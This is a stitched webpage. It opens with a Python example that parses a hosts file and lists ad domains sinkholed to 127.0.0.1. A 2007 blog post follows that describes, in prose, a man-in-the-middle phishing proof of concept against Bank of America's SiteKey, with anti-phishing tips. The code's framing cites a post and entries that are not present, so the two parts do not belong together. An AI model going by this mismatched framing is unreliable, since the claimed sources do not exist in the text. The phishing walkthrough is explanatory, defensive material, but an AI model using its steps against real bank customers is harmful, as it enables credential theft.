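The lookup order described above (consult the hosts file first, fall through to DNS only when there is no entry) is simple enough to model directly, and doing so shows both what the ad-blocking entries achieve and their main limitation. The following is an added example, not code from the original post: it parses hosts-file text in the format shown above, answers lookups the way the resolver would before asking DNS, and lists the names deliberately pointed at 127.0.0.1. The file content is constructed from the entries quoted in this post.

```python
"""Model the hosts file's short-circuit of DNS and list its sinkholed names.

Added example, not from the original post. parse_hosts reads the file format
(IP, then one or more names, '#' comments); lookup returns the local answer the
resolver would use before ever asking DNS; sinkholed_names lists the domains
pointed at an address that serves nothing. The sample file is constructed."""
import ipaddress

# Addresses used to send a name "nowhere"; localhost is the one legitimate entry.
SINKHOLES = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text):
    """Return {hostname (lower-cased): ip} from hosts-file text; later lines win."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)            # skip malformed lines rather than trust them
        except ValueError:
            continue
        for name in names:
            table[name.lower()] = ip
    return table


def lookup(table, hostname):
    """Local answer for hostname, or None meaning 'not here, fall through to DNS'."""
    return table.get(hostname.lower())


def sinkholed_names(table):
    """Names deliberately mapped to an address that serves nothing (excluding localhost)."""
    return sorted(n for n, ip in table.items() if ip in SINKHOLES and n != "localhost")


SAMPLE_HOSTS = """\
# hosts file assembled for this example from the entries in the post
127.0.0.1       localhost
192.168.1.4     ourmac
127.0.0.1       doubleclick.com
127.0.0.1       ads.doubleclick.com
127.0.0.1       ads.msn.com
"""

if __name__ == "__main__":
    t = parse_hosts(SAMPLE_HOSTS)
    for name in ("ourmac", "ads.msn.com", "www.cnn.com"):
        print(f"{name:<16} -> {lookup(t, name) or 'not in hosts, ask DNS'}")
    print("blocked:", ", ".join(sinkholed_names(t)))
```

The limitation the lookup makes obvious is that matching is on the exact name: blocking ads.doubleclick.com says nothing about any other host under doubleclick.com, which is why the downloadable block lists mentioned above run to thousands of lines, and why a browser-level blocker that understands patterns catches more.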

Bofa Busted

August 24, 2007 By: Ron Category: Internet security, Phishing 1 Comment →

One of the banks I use is Bank of America. When I first signed up for online access I was asked to create a SiteKey, and I thought, wow, this is clever security. SiteKey attempts to prevent phishing attacks by displaying, upon login, a graphic image that the user has set up themselves and given a unique name. This SiteKey is accomplished by using a secure cookie that is stored on the user’s computer; when logging in the server verifies some encrypted data in the cookie and presents you with your image. The premise is based on the theory that if you see your unique image and name, you can be certain that you are logging into their authorized website and not someone pretending to be Bank of America (phishing scam). That sounds all well and good, right? Not exactly, since a clever hacker using social engineering might just be able to get away with grabbing your logon credentials and hijacking your account. The proof of concept demonstrated here uses a man-in-the-middle attack.

Here is the definition from wikipedia:

In cryptography, a man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised. The attacker must be able to observe and intercept messages going between the two victims….

The breakdown occurs because there needs to be a way to allow someone to logon to a new computer. Let’s say you want to check your balance at work. So, BOA will ask you a secret question and if you answer it correctly you will get that cookie and then future logon attempts won’t need to ask you a security question. Once that is set, all future visits to the BOA site will show you your Sitekey graphic once you put in your username.

Here is how the grad student Christopher Soghoian did it. You get an email from a phisher that looks like a BOA email, with the logo and everything. Inside the email is a link that tells you to log on to your account. You click on the link and you are directed to a phisher’s site that looks exactly like BOA’s website. The malicious site asks you for your login id, and you type it in. The phisher’s site goes off (behind the scenes) and grabs your security question. This is normal, since BOA allows you to log on to the site from multiple computers and assumes that you are signing on using a computer that you don’t normally use. The phishing site presents the security question that you set up when you first signed up with BOA. Then the phisher’s site goes out to BOA, uses your answer to get your SiteKey, and presents it to you on a page that looks perfectly like BOA. You’re like, “hey, that’s my SiteKey – all must be well,” and you proceed with typing in your password. Your login credentials are now known by the bad guys; you have become a victim of a phishing attack. Some do say that, in reality, this attack could not actually be done, since BOA uses clever monitoring tools provided by RSA that would trigger an alarm if the same IP address was repeatedly requesting this type of first-time login. In any case, it just goes to show you how careful and vigilant one should be when entering private information online.

Here are some tips to avoid getting phished:

1. Never ever click on a link to log on to any site from an email. If you stick by that rule, you should be fine. Log in by typing the address directly into your browser or use a bookmark.

2. Always look for the security lock to the right of the address, or glance at the address bar to see if the URL starts with https. If not, close your browser (don’t even think of logging on). The video of the attack done by Chris shows the lock to the left of the address bar, which actually threw me off for a second until I saw “http://” without the “s” (very clever indeed).

3. Think about getting some anti-phishing software that you can download. Firefox has this technology already built into it.